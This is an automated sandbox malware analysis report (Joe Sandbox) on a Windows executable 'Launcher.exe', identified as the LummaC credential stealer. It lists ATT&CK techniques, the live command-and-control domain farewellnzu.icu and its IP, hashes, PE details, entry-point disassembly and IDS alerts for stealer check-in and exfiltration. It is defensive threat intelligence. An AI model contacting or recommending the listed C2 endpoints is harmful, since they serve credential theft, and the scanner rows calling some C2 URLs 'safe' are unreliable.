              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 5688, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory131
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares2
              Clipboard Data
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials33
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Launcher.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://farewellnzu.icu/d0%Avira URL Cloudsafe
              https://farewellnzu.icu/R0%Avira URL Cloudsafe
              https://farewellnzu.icu/pi100%Avira URL Cloudmalware
              https://farewellnzu.icu/apiu0%Avira URL Cloudsafe
              https://farewellnzu.icu/api0%Avira URL Cloudsafe
              https://farewellnzu.icu/icjJY%0%Avira URL Cloudsafe
              https://farewellnzu.icu/apibTr0%Avira URL Cloudsafe
              https://farewellnzu.icu:443/api0%Avira URL Cloudsafe
              https://farewellnzu.icu:443/apical0%Avira URL Cloudsafe
              https://farewellnzu.icu/0%Avira URL Cloudsafe
              farewellnzu.icu0%Avira URL Cloudsafe
              https://farewellnzu.icu/api(0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              farewellnzu.icu
              172.67.198.61
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://farewellnzu.icu/apitrue
                • Avira URL Cloud: safe
                unknown
                farewellnzu.icutrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabLauncher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/ac/?q=Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://farewellnzu.icu/dLauncher.exe, 00000003.00000002.2301370627.00000000034F3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoLauncher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Launcher.exe, 00000003.00000003.2192980116.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://farewellnzu.icu/piLauncher.exe, 00000003.00000003.2256165464.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2279108045.00000000034F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiLauncher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2192980116.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.rootca1.amazontrust.com0:Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.ecosia.org/newtab/Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgLauncher.exe, 00000003.00000003.2192980116.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLauncher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://farewellnzu.icu/icjJY%Launcher.exe, 00000003.00000003.2237349522.00000000034F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ac.ecosia.org/autocomplete?q=Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://farewellnzu.icu:443/apiLauncher.exe, 00000003.00000003.2299733490.000000000348A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2301211251.000000000348A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://crl.microLauncher.exe, 00000003.00000003.2256165464.00000000034AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2279108045.00000000034EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2237349522.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.00000000034AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLauncher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.c.lencr.org/0Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://farewellnzu.icu/RLauncher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://farewellnzu.icu/apibTrLauncher.exe, 00000003.00000002.2302063024.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLauncher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://farewellnzu.icu/apiuLauncher.exe, 00000003.00000003.2216504961.000000000351C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://farewellnzu.icu:443/apicalLauncher.exe, 00000003.00000002.2301211251.000000000348A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://support.mozilla.org/products/firefoxgro.allLauncher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.mozilla.orLauncher.exe, 00000003.00000003.2192933766.0000000005A7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://farewellnzu.icu/Launcher.exe, 00000003.00000003.2215048182.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2237349522.00000000034F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaLauncher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://farewellnzu.icu/api(Launcher.exe, 00000003.00000003.2216504961.000000000351C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  172.67.198.61
                                                                  farewellnzu.icuUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1561497
                                                                  Start date and time:2024-11-23 15:12:05 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 4m 52s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Launcher.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 78%
                                                                  • Number of executed functions: 36
                                                                  • Number of non-executed functions: 102
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: Launcher.exe
                                                                  TimeTypeDescription
                                                                  09:12:56API Interceptor8x Sleep call for process: Launcher.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  172.67.198.61Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                    VMX.exeGet hashmaliciousLummaCBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      farewellnzu.icuLoader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.44.93
                                                                      loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.44.93
                                                                      VMX.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.198.61
                                                                      BlazeVaze.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3
                                                                      Z8K4jt1j2H.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3
                                                                      SecuriteInfo.com.Win32.Evo-gen.14915.21522.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSS#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.33.116
                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.33.116
                                                                      arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                      • 104.26.13.205
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.70.128
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.162.84
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      Aura.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.33.116
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.198.61
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      Aura.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.198.61
                                                                      injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.198.61
                                                                      No context
                                                                      No created / dropped files found
                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.690596603357686
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Launcher.exe
                                                                      File size:512'512 bytes
                                                                      MD5:3ca9ca734f501c8de4270556f80f0f60
                                                                      SHA1:47652fb87960680ffe11dbc27a7969a2dacac97e
                                                                      SHA256:cfe6d27ef692f436653789758b0713bf8c6e1ed6267bd22775ed482777db96e5
                                                                      SHA512:6dc317d7157bb0f7407f17db3b0a55297e549fbaa2cdd83ddf6ac084452367aa602492b0d0f095396bf03ff9ab34df71da355ec4dfbc85db595ea86bb3af10d5
                                                                      SSDEEP:12288:EuYPABqG93bG2zYH13IypcLRDW+vHfQ1n21GwriB4tP/9h:1YPABNLGTV3xpclDWMHQ21IWt/
                                                                      TLSH:48B4E01AB993A1A3E6935C7981D8A772495EBF340F21A5FB53201B786F3B1D1C132B43
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ag.................h........................@..........................0............@.................................T...<..
                                                                      Icon Hash:00928e8e8686b000
                                                                      Entrypoint:0x41a890
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6741DAB7 [Sat Nov 23 13:37:59 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                      Instruction
                                                                      call 00007F425C80FE2Ah
                                                                      jmp 00007F425C80FC8Dh
                                                                      mov ecx, dword ptr [004305F0h]
                                                                      push esi
                                                                      push edi
                                                                      mov edi, BB40E64Eh
                                                                      mov esi, FFFF0000h
                                                                      cmp ecx, edi
                                                                      je 00007F425C80FE26h
                                                                      test esi, ecx
                                                                      jne 00007F425C80FE48h
                                                                      call 00007F425C80FE51h
                                                                      mov ecx, eax
                                                                      cmp ecx, edi
                                                                      jne 00007F425C80FE29h
                                                                      mov ecx, BB40E64Fh
                                                                      jmp 00007F425C80FE30h
                                                                      test esi, ecx
                                                                      jne 00007F425C80FE2Ch
                                                                      or eax, 00004711h
                                                                      shl eax, 10h
                                                                      or ecx, eax
                                                                      mov dword ptr [004305F0h], ecx
                                                                      not ecx
                                                                      pop edi
                                                                      mov dword ptr [004305ECh], ecx
                                                                      pop esi
                                                                      ret
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 14h
                                                                      and dword ptr [ebp-0Ch], 00000000h
                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                      and dword ptr [ebp-08h], 00000000h
                                                                      push eax
                                                                      call dword ptr [0042E46Ch]
                                                                      mov eax, dword ptr [ebp-08h]
                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                      mov dword ptr [ebp-04h], eax
                                                                      call dword ptr [0042E430h]
                                                                      xor dword ptr [ebp-04h], eax
                                                                      call dword ptr [0042E42Ch]
                                                                      xor dword ptr [ebp-04h], eax
                                                                      lea eax, dword ptr [ebp-14h]
                                                                      push eax
                                                                      call dword ptr [0042E4A8h]
                                                                      mov eax, dword ptr [ebp-10h]
                                                                      lea ecx, dword ptr [ebp-04h]
                                                                      xor eax, dword ptr [ebp-14h]
                                                                      xor eax, dword ptr [ebp-04h]
                                                                      xor eax, ecx
                                                                      leave
                                                                      ret
                                                                      mov eax, 00004000h
                                                                      ret
                                                                      push 00431970h
                                                                      call dword ptr [0042E488h]
                                                                      ret
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      mov al, 01h
                                                                      ret
                                                                      push 00030000h
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e2540x3c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x340000x143c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x287c00xc0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2e3c80x138.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x266ba0x268009fc12b2919d7993b7875b406673b0c41False0.5423155945616883data6.676506145316532IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x280000x72640x7400662c29d34464011348a2d81d315c214bFalse0.40833782327586204data4.811823385654876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x300000x20680x100051c3c578bc7da757e8ebeb0ea4aceef9False0.484619140625OpenPGP Secret Key5.084546541546572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .bss0x330000x80x20064e01fde7e0180fcba7fdb172e6bbca6False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x340000x143c0x1600a55fdfa9c914f00e7079e3187805e326False0.7510653409090909data6.285750152953626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      .coS0x360000x4c8000x4c8008befc085f0df655fec9542b48d2685bdFalse1.0003382863562091data7.999380848476415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      DLLImport
                                                                      KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                      GDI32.dllCreateEllipticRgn
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-23T15:12:56.139869+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649699172.67.198.61443TCP
                                                                      2024-11-23T15:12:56.824663+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649699172.67.198.61443TCP
                                                                      2024-11-23T15:12:56.824663+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649699172.67.198.61443TCP
                                                                      2024-11-23T15:12:58.155926+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649700172.67.198.61443TCP
                                                                      2024-11-23T15:12:58.873935+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649700172.67.198.61443TCP
                                                                      2024-11-23T15:12:58.873935+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649700172.67.198.61443TCP
                                                                      2024-11-23T15:13:00.455993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649701172.67.198.61443TCP
                                                                      2024-11-23T15:13:02.633812+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649702172.67.198.61443TCP
                                                                      2024-11-23T15:13:04.879612+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649703172.67.198.61443TCP
                                                                      2024-11-23T15:13:07.273471+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649705172.67.198.61443TCP
                                                                      2024-11-23T15:13:07.978282+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649705172.67.198.61443TCP
                                                                      2024-11-23T15:13:09.881039+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711172.67.198.61443TCP
                                                                      2024-11-23T15:13:13.548014+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724172.67.198.61443TCP
                                                                      2024-11-23T15:13:14.265345+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649724172.67.198.61443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 23, 2024 15:12:54.864677906 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:54.864708900 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:54.864824057 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:54.868093014 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:54.868113041 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.139707088 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.139868975 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.144181013 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.144213915 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.144664049 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.193450928 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.193492889 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.193607092 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.824656010 CET44349699172.67.198.61192.168.2.6
